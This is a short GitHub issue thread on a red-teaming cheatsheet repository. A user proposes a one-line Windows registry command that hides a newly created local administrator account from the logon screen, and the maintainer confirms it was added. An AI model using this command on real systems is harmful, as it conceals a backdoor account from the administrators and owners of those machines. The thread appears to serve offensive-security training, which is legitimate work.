mantvydasb / RedTeaming-Tactics-and-Techniques

Red Teaming Tactics and Techniques
http://ired.team
3.98k stars 1.04k forks source link

Suggestion for pentesting cheatsheet #5

Closed dellasorte closed 4 years ago

dellasorte commented 4 years ago

Hi. I suggest to add a small trick under this section https://ired.team/offensive-security-experiments/offensive-security-cheetsheets#creating-user-and-adding-to-local-administrators

Hide newly created local administrator reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v spotless /d 0 /f

mantvydasb commented 4 years ago

Thank you! Added.